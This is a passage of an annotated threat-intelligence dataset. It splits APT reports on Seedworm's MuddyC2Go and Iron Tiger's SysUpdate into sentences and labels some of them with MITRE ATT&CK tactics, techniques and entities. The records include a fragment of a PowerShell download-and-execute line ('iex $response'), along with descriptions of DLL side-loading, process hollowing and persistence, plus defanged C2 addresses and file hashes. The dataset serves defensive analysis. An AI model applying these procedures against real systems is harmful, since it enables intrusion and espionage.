"uid": "aptnotes-20_aptnotes_report-p3-s31-56bee6", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 31, "context_before": "Stop;Write-Output $response.", "sentence_text": "Content;iex $response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p3-s32-abe78d", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 32, "context_before": "Content;iex $response.", "sentence_text": "Content;\nThe MuddyC2Go framework was first publicly written about in a blog published by Deep Instinct researchers on November 8, 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p3-s33-a2b85e", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 33, "context_before": "Content;\nThe MuddyC2Go framework was first publicly written about in a blog published by Deep Instinct researchers on November 8, 2023.", "sentence_text": "That blog documented its use in attacks on organizations in countries in the Middle East.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p3-s34-73ceba", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 34, "context_before": "That blog documented its use in attacks on organizations in countries in the Middle East.", "sentence_text": "The researchers said the framework may have been used by Seedworm since 2020.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p3-s35-3ff6c9", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 35, "context_before": "The researchers said the framework may have been used by Seedworm since 2020.", "sentence_text": "They also said that the framework, which is written in Go, has replaced Seedworm’s previous PhonyC2 C&C infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p3-s36-68fdb9", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 36, "context_before": "They also said that the framework, which is written in Go, has replaced Seedworm’s previous PhonyC2 C&C infrastructure.", "sentence_text": "This replacement appears to have occurred after the PhonyC2 source code was leaked earlier in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p3-s37-ae9a61", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 37, "context_before": "This replacement appears to have occurred after the PhonyC2 source code was leaked earlier in 2023.", "sentence_text": "The full capabilities of MuddyC2Go are not yet known, but the executable contains an embedded PowerShell script that automatically connects to Seedworm’s C&C server, which eliminates the need for manual execution by an operator and gives the attackers remote access to a victim machine.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "Automatically connect to a C2 server using an embedded script within the executable.", "entities": [ { "text": "automatically connects to Seedworm’s C&C server", "start": 117, "end": 164, "label": "Action" }, { "text": "Seedworm’s C&C server", "start": 143, "end": 164, "label": "Infrastructure_Indicator" }, { "text": "MuddyC2Go", "start": 25, "end": 34, "label": "MalwareTool" } ] }, { "uid": "aptnotes-20_aptnotes_report-p3-s38-18e857", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 38, "context_before": "The full capabilities of MuddyC2Go are not yet known, but the executable contains an embedded PowerShell script that automatically connects to Seedworm’s C&C server, which eliminates the need for manual execution by an operator and gives the attackers remote access to a victim machine.", "sentence_text": "Deep Instinct said it was able to link MuddyC2Go to attacks dating back to 2020 due to the unique URL patterns generated by the framework.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p3-s39-43465e", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 39, "context_before": "Deep Instinct said it was able to link MuddyC2Go to attacks dating back to 2020 due to the unique URL patterns generated by the framework.", "sentence_text": "It also said that the MuddyC2Go servers it observed were hosted at “Stark Industries”, which is a VPS provider that is known to host malicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p3-s40-21725f", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 40, "context_before": "It also said that the MuddyC2Go servers it observed were hosted at “Stark Industries”, which is a VPS provider that is known to host malicious activity.", "sentence_text": "Other tools of note used in this activity included SimpleHelp, which is a legitimate remote device control and management tool, for persistence on victim machines.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Software" } ], "procedure": "Use SimpleHelp remote access software to maintain persistence on victim machines.", "entities": [ { "text": "used in this activity", "start": 20, "end": 41, "label": "Action" }, { "text": "for persistence on victim machines", "start": 128, "end": 162, "label": "Action" }, { "text": "SimpleHelp", "start": 51, "end": 61, "label": "MalwareTool" } ] }, { "uid": "aptnotes-20_aptnotes_report-p3-s41-c96c34", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 41, "context_before": "Other tools of note used in this activity included SimpleHelp, which is a legitimate remote device control and management tool, for persistence on victim machines.", "sentence_text": "SimpleHelp is believed to have been used in attacks carried out by Seedworm since at least July 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p3-s42-c0cb80", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 42, "context_before": "SimpleHelp is believed to have been used in attacks carried out by Seedworm since at least July 2022.", "sentence_text": "SimpleHelp also allows attackers to execute commands on a device with administrator privileges.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p3-s43-cc623d", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 43, "context_before": "SimpleHelp also allows attackers to execute commands on a device with administrator privileges.", "sentence_text": "SimpleHelp is now strongly associated with Seedworm activity and the tool is installed on several of Seedworm’s servers.\n3/6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s44-7050cf", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 44, "context_before": "SimpleHelp is now strongly associated with Seedworm activity and the tool is installed on several of Seedworm’s servers.\n3/6", "sentence_text": "Venom Proxy is a publicly available tool that is described as “a multi-hop proxy tool developed for penetration testers.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s45-851060", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 45, "context_before": "Venom Proxy is a publicly available tool that is described as “a multi-hop proxy tool developed for penetration testers.”", "sentence_text": "It is written in Go.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s46-ed6ec2", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 46, "context_before": "It is written in Go.", "sentence_text": "It can be used to easily proxy network traffic to a multi-layer intranet, and easily manage intranet nodes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s47-2caa59", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 47, "context_before": "It can be used to easily proxy network traffic to a multi-layer intranet, and easily manage intranet nodes.", "sentence_text": "It has been associated with Seedworm since at least mid-2022, with Microsoft describing it as Seedworm’s “tool of choice” in an August 2022 blog.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s48-730232", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 48, "context_before": "It has been associated with Seedworm since at least mid-2022, with Microsoft describing it as Seedworm’s “tool of choice” in an August 2022 blog.", "sentence_text": "Seedworm tends to use a custom build of Venom Proxy in its activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s49-71a76b", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 49, "context_before": "Seedworm tends to use a custom build of Venom Proxy in its activity.", "sentence_text": "Other tools used in this activity include:\nRevsocks - A cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s50-5ab84e", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 50, "context_before": "Other tools used in this activity include:\nRevsocks - A cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.", "sentence_text": "AnyDesk - A legitimate remote desktop application.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s51-996e4a", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 51, "context_before": "AnyDesk - A legitimate remote desktop application.", "sentence_text": "It and similar tools are often used by attackers to obtain remote access to computers on a network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s52-46737a", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 52, "context_before": "It and similar tools are often used by attackers to obtain remote access to computers on a network.", "sentence_text": "PowerShell - Seedworm makes heavy use of PowerShell, as well as PowerShell- based tools and scripts in its attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s53-de5624", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 53, "context_before": "PowerShell - Seedworm makes heavy use of PowerShell, as well as PowerShell- based tools and scripts in its attacks.", "sentence_text": "PowerShell is a Microsoft scripting tool that can be used to run commands, download payloads, traverse compromised networks, and carry out reconnaissance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s54-09761a", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 54, "context_before": "PowerShell is a Microsoft scripting tool that can be used to run commands, download payloads, traverse compromised networks, and carry out reconnaissance.", "sentence_text": "Custom keylogger\nConclusion\nSeedworm has long had an interest in telecommunications organizations, as do many groups engaged in cyberespionage activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s55-b03bd2", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 55, "context_before": "Custom keylogger\nConclusion\nSeedworm has long had an interest in telecommunications organizations, as do many groups engaged in cyberespionage activities.", "sentence_text": "That one of the victim organizations in this campaign is based in Egypt is also of note given Egypt’s proximity to Israel, a frequent target of Seedworm.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s56-32bbe7", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 56, "context_before": "That one of the victim organizations in this campaign is based in Egypt is also of note given Egypt’s proximity to Israel, a frequent target of Seedworm.", "sentence_text": "Seedworm appears to remain focused on using a wide array of living-off-the-land and publicly available tools in its attack chains, no doubt in an effort to remain undetected on victim networks for as long as possible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s57-2fb9a1", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 57, "context_before": "Seedworm appears to remain focused on using a wide array of living-off-the-land and publicly available tools in its attack chains, no doubt in an effort to remain undetected on victim networks for as long as possible.", "sentence_text": "However, its recent more wide adoption of new C&C infrastructure in the form of MuddyC2Go is notable and shows that the group continues to innovate and develop its toolset when required in order to keep its activity under the radar.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s58-2834db", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 58, "context_before": "However, its recent more wide adoption of new C&C infrastructure in the form of MuddyC2Go is notable and shows that the group continues to innovate and develop its toolset when required in order to keep its activity under the radar.", "sentence_text": "The group still makes heavy use of PowerShell and PowerShell-related tools and scripts, underlining the need for organizations to be aware of suspicious use of PowerShell on their networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p4-s59-d6ebbb", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 4, "sentence_id": 59, "context_before": "The group still makes heavy use of PowerShell and PowerShell-related tools and scripts, underlining the need for organizations to be aware of suspicious use of PowerShell on their networks.", "sentence_text": "The activity observed by Symantec’s Threat Hunter Team took place in November 2023, showing that Seedworm is very much a currently active threat faced by organizations that may be of strategic interest to Iranian threat actors.\n4/6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p5-s60-a3e253", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 5, "sentence_id": 60, "context_before": "The activity observed by Symantec’s Threat Hunter Team took place in November 2023, showing that Seedworm is very much a currently active threat faced by organizations that may be of strategic interest to Iranian threat actors.\n4/6", "sentence_text": "Protection/Mitigation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p5-s61-bfa616", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 5, "sentence_id": 61, "context_before": "Protection/Mitigation", "sentence_text": "For the latest protection updates, please visit the Symantec Protection Bulletin.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p5-s62-6efbc7", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 5, "sentence_id": 62, "context_before": "For the latest protection updates, please visit the Symantec Protection Bulletin.", "sentence_text": "Indicators of Compromise If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p5-s63-2b2ab8", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 5, "sentence_id": 63, "context_before": "Indicators of Compromise If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.", "sentence_text": "File Indicators\n1a0827082d4b517b643c86ee678eaa53f85f1b33ad409a23c50164c3909fdaca –\nMuddyC2Go DLL launcher 25b985ce5d7bf15015553e30927691e7673a68ad071693bf6d0284b069ca6d6a – Benign Java(TM)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p5-s64-c99634", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 5, "sentence_id": 64, "context_before": "File Indicators\n1a0827082d4b517b643c86ee678eaa53f85f1b33ad409a23c50164c3909fdaca –\nMuddyC2Go DLL launcher 25b985ce5d7bf15015553e30927691e7673a68ad071693bf6d0284b069ca6d6a – Benign Java(TM)", "sentence_text": "Platform SE 8 executable used for sideloading MuddyC2Go DLL eac8e7989c676b9a894ef366357f1cf8e285abde083fbdf92b3619f707ce292f – Custom keylogger 3916ba913e4d9a46cfce437b18735bbb5cc119cc97970946a1ac4eab6ab39230 – Venom Proxy Network Indicators 146.70.124[.]102 – SimpleHelp C&C server 94.131.109[.]65 – MuddyC2Go C&C server 95.164.38[.]99 –MuddyC2Go C&C server 45.67.230[.]91 – MuddyC2Go C&C server 95.164.46[.]199 – MuddyC2Go C&C server 94.131.98[.]14 – MuddyC2Go C&C server 94.131.3[.]160 – GoSOCKS5proxy", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p5-s65-09f84e", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 5, "sentence_id": 65, "context_before": "Platform SE 8 executable used for sideloading MuddyC2Go DLL eac8e7989c676b9a894ef366357f1cf8e285abde083fbdf92b3619f707ce292f – Custom keylogger 3916ba913e4d9a46cfce437b18735bbb5cc119cc97970946a1ac4eab6ab39230 – Venom Proxy Network Indicators 146.70.124[.]102 – SimpleHelp C&C server 94.131.109[.]65 – MuddyC2Go C&C server 95.164.38[.]99 –MuddyC2Go C&C server 45.67.230[.]91 – MuddyC2Go C&C server 95.164.46[.]199 – MuddyC2Go C&C server 94.131.98[.]14 – MuddyC2Go C&C server 94.131.3[.]160 – GoSOCKS5proxy", "sentence_text": "C&C server About the Author Threat Hunter Team Symantec 5/6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p1-s1-48dda1", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Iron Tiger’s SysUpdate Reappears, Adds Linux Targeting trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html March 1, 2023 APT & Targeted Attacks We detail the update that advanced persistent threat (APT) group Iron Tiger made on the custom malware family SysUpdate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p1-s2-5c96fd", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "Iron Tiger’s SysUpdate Reappears, Adds Linux Targeting trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html March 1, 2023 APT & Targeted Attacks We detail the update that advanced persistent threat (APT) group Iron Tiger made on the custom malware family SysUpdate.", "sentence_text": "In this version, we also found components that enable the malware to compromise Linux systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p1-s3-bb7ec7", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "In this version, we also found components that enable the malware to compromise Linux systems.", "sentence_text": "By: Daniel Lunghi March 01, 2023 Read time: 11 min (3060 words)\nIron Tiger is an advanced persistent threat (APT) group that has been focused primarily on cyberespionage for more than a decade.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p1-s4-152d1d", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "By: Daniel Lunghi March 01, 2023 Read time: 11 min (3060 words)\nIron Tiger is an advanced persistent threat (APT) group that has been focused primarily on cyberespionage for more than a decade.", "sentence_text": "We found the oldest sample of this updated version in July 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p1-s5-7eadb7", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "We found the oldest sample of this updated version in July 2022.", "sentence_text": "At the time, we attributed the sample to Iron Tiger but had not yet identified the final payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p1-s6-15fe6b", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "At the time, we attributed the sample to Iron Tiger but had not yet identified the final payload.", "sentence_text": "It was only after finding multiple similar payloads in late October 2022 that we looked further and found similarities with the SysUpdate malware family that had also been updated in 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p1-s7-e94ef5", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "It was only after finding multiple similar payloads in late October 2022 that we looked further and found similarities with the SysUpdate malware family that had also been updated in 2021.", "sentence_text": "Both changes make reverse engineering the samples longer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p1-s8-30c9a9", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "Both changes make reverse engineering the samples longer.", "sentence_text": "We strongly advise organizations and users in the targeted industries to reinforce their security measures to defend their systems and stored information from this ongoing campaign.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p1-s9-f4de6c", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "We strongly advise organizations and users in the targeted industries to reinforce their security measures to defend their systems and stored information from this ongoing campaign.", "sentence_text": "Campaign development timeline These are the key dates for understanding the chronology of Iron Tiger’s operations:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p1-s11-38aaa1", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 1, "sentence_id": 11, "context_before": "Apr. 2, 2022:", "sentence_text": "Registration of the domain name linked to our oldest Windows sample of SysUpdate May 11, 2022: The command and control (C&C) infrastructure was set up.\nJune 8, 2022: While this could have been tampered with, observed compilation date of our oldest Windows sample.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p1-s12-143a9b", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 1, "sentence_id": 12, "context_before": "Registration of the domain name linked to our oldest Windows sample of SysUpdate May 11, 2022: The command and control (C&C) infrastructure was set up.\nJune 8, 2022: While this could have been tampered with, observed compilation date of our oldest Windows sample.", "sentence_text": "Oldest Linux sample gets uploaded to Virus Total 1/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p2-s13-5469b0", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 2, "sentence_id": 13, "context_before": "Oldest Linux sample gets uploaded to Virus Total 1/11", "sentence_text": "We observed that the attacker registered the oldest domain name one month before starting the C&C configuration then waited one more month before compiling the malicious sample linked to that domain name.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p2-s14-1d26b3", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "We observed that the attacker registered the oldest domain name one month before starting the C&C configuration then waited one more month before compiling the malicious sample linked to that domain name.", "sentence_text": "We think the gap between the two updates allows the attackers to plan their operations accordingly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p2-s15-8f9f4f", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "We think the gap between the two updates allows the attackers to plan their operations accordingly.", "sentence_text": "Loading process\nWe observed the loading process entailing the following steps:\nThe attacker runs rc.exe, a legitimate “Microsoft Resource Compiler” signed file , which is vulnerable to a DLL side-loading vulnerability, and loads a file named rc.dll.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.002", "name": "Hijack Execution Flow: DLL Side-Loading" } ], "procedure": "Execute rc.exe to load a malicious DLL (rc.dll) via DLL side-loading.", "entities": [ { "text": "runs rc.exe", "start": 92, "end": 103, "label": "Action" }, { "text": "loads a file named rc.dll", "start": 223, "end": 248, "label": "Action" }, { "text": "rc.exe", "start": 97, "end": 103, "label": "MalwareTool" }, { "text": "rc.dll", "start": 242, "end": 248, "label": "MalwareTool" } ] }, { "uid": "aptnotes-21_aptnotes_report-p2-s16-45006b", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "Loading process\nWe observed the loading process entailing the following steps:\nThe attacker runs rc.exe, a legitimate “Microsoft Resource Compiler” signed file , which is vulnerable to a DLL side-loading vulnerability, and loads a file named rc.dll.", "sentence_text": "The malicious rc.dll loads a file named rc.bin in memory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p2-s17-431bd3", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "The malicious rc.dll loads a file named rc.bin in memory.", "sentence_text": "The rc.bin file is a Shikata Ga Nai encoded shellcode that decompresses and loads the first stage in memory.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1620", "name": "Reflective Code Loading" } ], "procedure": "Decompress encoded shellcode and load the next stage payload directly into memory.", "entities": [ { "text": "decompresses", "start": 59, "end": 71, "label": "Action" }, { "text": "loads the first stage in memory", "start": 76, "end": 107, "label": "Action" }, { "text": "rc.bin", "start": 4, "end": 10, "label": "MalwareTool" }, { "text": "Shikata Ga Nai encoded shellcode", "start": 21, "end": 53, "label": "MalwareTool" } ] }, { "uid": "aptnotes-21_aptnotes_report-p2-s18-2321f2", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 2, "sentence_id": 18, "context_before": "The rc.bin file is a Shikata Ga Nai encoded shellcode that decompresses and loads the first stage in memory.", "sentence_text": "Depending on the number of command line parameters, different actions are performed:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p2-s19-9e18da", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "Depending on the number of command line parameters, different actions are performed:", "sentence_text": "Zero or two parameters: “Installs” the malware in the system, and calls Stage 1 again via process hollowing with four parameters One parameter: Same as previous action but without the “installation” Four parameters: Creates a memory section with the DES-encrypted malware configuration and a second Shikata Ga Nai shellcode decompressing and loading Stage 2.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055.012", "name": "Process Injection: Process Hollowing" }, { "id": "T1620", "name": "Reflective Code Loading" } ], "procedure": "Install malware, re-execute Stage 1 via process hollowing, and create an in-memory section to decrypt, decompress, and load Stage 2 payload.", "entities": [ { "text": "“Installs” the malware in the system", "start": 24, "end": 60, "label": "Action" }, { "text": "calls Stage 1 again via process hollowing", "start": 66, "end": 107, "label": "Action" }, { "text": "Creates a memory section", "start": 216, "end": 240, "label": "Action" }, { "text": "decompressing and loading Stage 2", "start": 324, "end": 357, "label": "Action" }, { "text": "process hollowing", "start": 90, "end": 107, "label": "Action" }, { "text": "Shikata Ga Nai shellcode", "start": 299, "end": 323, "label": "MalwareTool" } ] }, { "uid": "aptnotes-21_aptnotes_report-p2-s20-a2c881", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 2, "sentence_id": 20, "context_before": "Zero or two parameters: “Installs” the malware in the system, and calls Stage 1 again via process hollowing with four parameters One parameter: Same as previous action but without the “installation” Four parameters: Creates a memory section with the DES-encrypted malware configuration and a second Shikata Ga Nai shellcode decompressing and loading Stage 2.", "sentence_text": "It then runs Stage 2 via process hollowing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p2-s21-f05976", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 2, "sentence_id": 21, "context_before": "It then runs Stage 2 via process hollowing.", "sentence_text": "The “installation” step is considered simple wherein the malware moves the files to a hardcoded folder.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p2-s22-264a0e", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 2, "sentence_id": 22, "context_before": "The “installation” step is considered simple wherein the malware moves the files to a hardcoded folder.", "sentence_text": "Depending on the privileges of the process, the malware either creates a registry key or a service that launches the moved executable rc.exe with one parameter.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1547.001", "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" }, { "id": "T1543.003", "name": "Create or Modify System Process: Windows Service" } ], "procedure": "Create a registry key or Windows service to execute rc.exe automatically.", "entities": [ { "text": "creates a registry key", "start": 63, "end": 85, "label": "Action" }, { "text": "creates a registry key or a service", "start": 63, "end": 98, "label": "Action" }, { "text": "launches the moved executable rc.exe", "start": 104, "end": 140, "label": "Action" }, { "text": "rc.exe", "start": 134, "end": 140, "label": "MalwareTool" } ] }, { "uid": "aptnotes-21_aptnotes_report-p2-s23-f776f9", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 2, "sentence_id": 23, "context_before": "Depending on the privileges of the process, the malware either creates a registry key or a service that launches the moved executable rc.exe with one parameter.", "sentence_text": "This ensures that the malware will be launched during the next reboot, skipping the installation part.\n2/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p3-s24-711c8f", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 3, "sentence_id": 24, "context_before": "This ensures that the malware will be launched during the next reboot, skipping the installation part.\n2/11", "sentence_text": "We identified the executables and sideloaded files as follows:\nLegitimate Loaded binary application name Certificate signer Side-loaded DLL name file name INISafeWebSSO.exe Initech inicore_v2.3.30.dll inicore_v2.3.30.bin rc.exe Microsoft rcdll.dll rcdll.bin dlpumgr32.exe DESlock DLPPREM32.dll sv.bin GDFInstall.exe UBISOFT GameuxInstallHelper.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p3-s25-5c6a2f", "source": 